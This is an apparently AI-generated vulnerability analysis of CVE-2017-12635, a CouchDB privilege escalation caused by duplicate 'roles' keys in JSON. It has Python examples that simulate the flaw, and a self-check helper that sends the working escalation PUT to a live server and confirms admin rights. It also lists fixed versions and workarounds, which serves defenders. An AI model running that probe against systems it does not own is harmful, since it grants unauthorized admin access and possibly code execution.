This is a summary of the AI-generated 10-question deep analysis.
Q1 What is this vulnerability? (Essence + Consequences)
**Essence**: A critical privilege escalation flaw in Apache CouchDB (CVE-2017-12635). A `_users` document with two `roles` keys is parsed twice: the JavaScript `validate_doc_update` function sees the last key (JSON.parse semantics) and accepts an empty role list, while the Erlang JSON parser that persists the document keeps the first key, `["_admin"]`…
**Privileges**: Escalate from **Non-Admin** to **Admin** (`_admin` role). **Data Access**: Full read/write access to all databases. **Impact**: Potential Remote Code Execution (RCE): an admin can register a query server through the configuration API, and the registered command runs on the host as the CouchDB system user.
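To make the root cause concrete, the following added example (not code from the page or from CouchDB) replays the two parses a vulnerable server effectively performs on one constructed `_users` document. Python's `json.loads` already keeps the last duplicate key, like JavaScript's `JSON.parse`; the first-key-wins behaviour of the Erlang side is emulated with an `object_pairs_hook`. The validator is a simplified stand-in for the `_users` design document's check, and the duplicate-rejecting parser at the end is this example's own hardening, not CouchDB's actual patch.

```python
"""Duplicate-key parser discrepancy behind CVE-2017-12635 (added illustration)."""
import json

# Constructed attacker document: the first `roles` value is what gets stored,
# the second is what the JavaScript validation function sees.
PROBE_DOC = (
    '{"type":"user","name":"probe","password":"probe",'
    '"roles":["_admin"],"roles":[]}'
)


def parse_last_wins(text):
    """JSON.parse semantics (also Python's default): last duplicate key wins."""
    return json.loads(text)


def parse_first_wins(text):
    """Emulates the Erlang-side parser: first duplicate key wins."""
    def first_wins(pairs):
        out = {}
        for key, value in pairs:
            out.setdefault(key, value)   # later duplicates are ignored
        return out
    return json.loads(text, object_pairs_hook=first_wins)


def users_validate_doc_update(new_doc, requester_roles):
    """Simplified stand-in (hypothetical) for the `_users` validation rule:
    a non-admin requester may not write a user document that carries `_admin`.
    Returns True when the write is accepted."""
    if "_admin" in requester_roles:
        return True
    return "_admin" not in new_doc.get("roles", [])


def simulate_write(raw_doc, requester_roles=()):
    """Validate with last-wins parsing, persist with first-wins parsing, and
    report what each side saw.  `stored_roles` is None if the write was rejected."""
    seen_by_validator = parse_last_wins(raw_doc)
    accepted = users_validate_doc_update(seen_by_validator, requester_roles)
    stored = parse_first_wins(raw_doc) if accepted else None
    return {
        "validator_roles": seen_by_validator.get("roles", []),
        "accepted": accepted,
        "stored_roles": stored.get("roles", []) if stored else None,
    }


def parse_reject_duplicates(text):
    """Hardened parse (this example's own choice): any duplicated key is an error,
    so validation and storage can never disagree about a field."""
    def no_dupes(pairs):
        out = {}
        for key, value in pairs:
            if key in out:
                raise ValueError(f"duplicate key: {key!r}")
            out[key] = value
        return out
    return json.loads(text, object_pairs_hook=no_dupes)


if __name__ == "__main__":
    print(simulate_write(PROBE_DOC))
    # An honest document naming `_admin` outright is still refused.
    print(simulate_write('{"type":"user","name":"x","password":"x","roles":["_admin"]}'))
```

Running `simulate_write(PROBE_DOC)` shows the validator accepting `roles == []` while the persisted document carries `["_admin"]`; the same document submitted without the trick is rejected, which is why the duplicate key is the whole exploit.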
Q5 Is the exploitation threshold high? (Auth/Config)
**Threshold**: **LOW**. **Auth**: The attacker only needs to be able to write a document to the `_users` database. With CouchDB's default configuration, which allows public signup, no prior credentials are required: the malicious user document is created in the same request that escalates it. **Config**: No special configuration is needed; the flaw lives in the JSON handling behind the standard HTTP API and is reached with a single `PUT` to `_users`.
Q6 Is there a public exploit? (PoC/Wild Exploitation)
**Public Exp**: **YES**. Multiple PoCs and exploits are available on GitHub (e.g., `CVE-2017-12635-EXP`, `CVE-2017-12635-POC`). **Wild Exploitation**: High risk, since the attack is a single HTTP request and simple Python scripts are available.
Q7 How to self-check? (Features/Scanning)
**Self-Check**: Scan for CouchDB instances on port 5984 (6984 for HTTPS); `GET /` returns a JSON banner whose `version` field can be compared against the fixed releases. **Test**: Attempt to create a user with duplicate `roles` keys in the JSON payload, then log in as that user and check whether `GET /_session` reports `_admin` in `userCtx.roles`…
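The self-check above, as an added example (not from the page or the CouchDB project): a banner-based version test that is safe to run anywhere, a builder for the duplicate-key probe document, and an interpreter for the `_session` reply. The `check_host` function performs the live test and actually creates a user document, so it belongs only on systems you own; the host, user name and function names are this example's own assumptions, and the sample banner and session replies are constructed.

```python
"""CVE-2017-12635 self-check helpers (added example, not CouchDB's own code)."""
import base64
import json
import urllib.request

# First fixed release per major line (from the advisory: 1.7.0 and 2.1.1).
FIXED = {1: (1, 7, 0), 2: (2, 1, 1)}

# Constructed sample replies, shaped like `GET /` and `GET /_session`.
SAMPLE_BANNER = '{"couchdb":"Welcome","version":"1.6.1","vendor":{"name":"The Apache Software Foundation"}}'
SAMPLE_SESSION_VULNERABLE = '{"ok":true,"userCtx":{"name":"probe","roles":["_admin"]},"info":{}}'
SAMPLE_SESSION_PATCHED = '{"ok":true,"userCtx":{"name":"probe","roles":[]},"info":{}}'


def parse_version(text):
    """'1.6.1' -> (1, 6, 1); tolerates suffixes such as '2.1.1-rc1'."""
    core = text.split("-")[0].split("+")[0]
    parts = [int(p) for p in core.split(".")[:3]]
    while len(parts) < 3:
        parts.append(0)
    return tuple(parts)


def version_is_vulnerable(version):
    """True for 1.x below 1.7.0 and 2.x below 2.1.1.  Pre-1.0 releases predate
    the fix; 3.x and later shipped with it."""
    v = parse_version(version)
    fixed = FIXED.get(v[0])
    if fixed is None:
        return v[0] < 1
    return v < fixed


def banner_is_vulnerable(banner_json):
    """Apply the version test to the JSON body returned by `GET /`."""
    return version_is_vulnerable(json.loads(banner_json).get("version", "0"))


def probe_document(name, password):
    """Raw JSON with two `roles` keys.  A dict cannot hold duplicate keys, so the
    tail of the object is appended to the serialized head by hand."""
    head = json.dumps({"type": "user", "name": name, "password": password})
    return head[:-1] + ',"roles":["_admin"],"roles":[]}'


def session_grants_admin(session_json):
    """True if `GET /_session` for the probe user reports `_admin`, i.e. the
    duplicate-key document was stored with the first `roles` value."""
    ctx = json.loads(session_json).get("userCtx", {})
    return "_admin" in ctx.get("roles", [])


def check_host(base_url="http://127.0.0.1:5984", name="probe", password="probe"):
    """Live check (network; not exercised by the offline tests).  Step 1 is
    read-only; step 2 writes org.couchdb.user:<name>, so remove it afterwards."""
    with urllib.request.urlopen(base_url + "/") as resp:
        banner = resp.read().decode()
    result = {"version": json.loads(banner).get("version"),
              "version_vulnerable": banner_is_vulnerable(banner)}
    put = urllib.request.Request(
        f"{base_url}/_users/org.couchdb.user:{name}",
        data=probe_document(name, password).encode(),
        method="PUT", headers={"Content-Type": "application/json"})
    with urllib.request.urlopen(put) as resp:
        resp.read()
    token = base64.b64encode(f"{name}:{password}".encode()).decode()
    session = urllib.request.Request(
        base_url + "/_session", headers={"Authorization": "Basic " + token})
    with urllib.request.urlopen(session) as resp:
        result["escalated"] = session_grants_admin(resp.read().decode())
    return result


if __name__ == "__main__":
    print("banner vulnerable:", banner_is_vulnerable(SAMPLE_BANNER))
    print("probe doc:", probe_document("probe", "probe"))
    print("session escalated:", session_grants_admin(SAMPLE_SESSION_VULNERABLE))
```

The version test alone is a reliable first pass because the banner is served unauthenticated; the live probe is the ground truth, since a backported distribution package can carry the fix under an old version string.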
**Fixed**: **YES**. Official patches released. **Solution**: Upgrade to **CouchDB 1.7.0** or **2.1.1+**. **Vendor Advisory**: Gentoo GLSA-201711-16 and Debian LTS updates confirm the fixes.
Q9 What if no patch? (Workaround)
**Workaround**: If patching is impossible, **disable public registration** of users, so that only an administrator can create `_users` documents; the escalation needs that write and nothing else. **Mitigation**: Restrict access to the `_users` database via firewall or reverse proxy, and keep the CouchDB HTTP port off untrusted networks…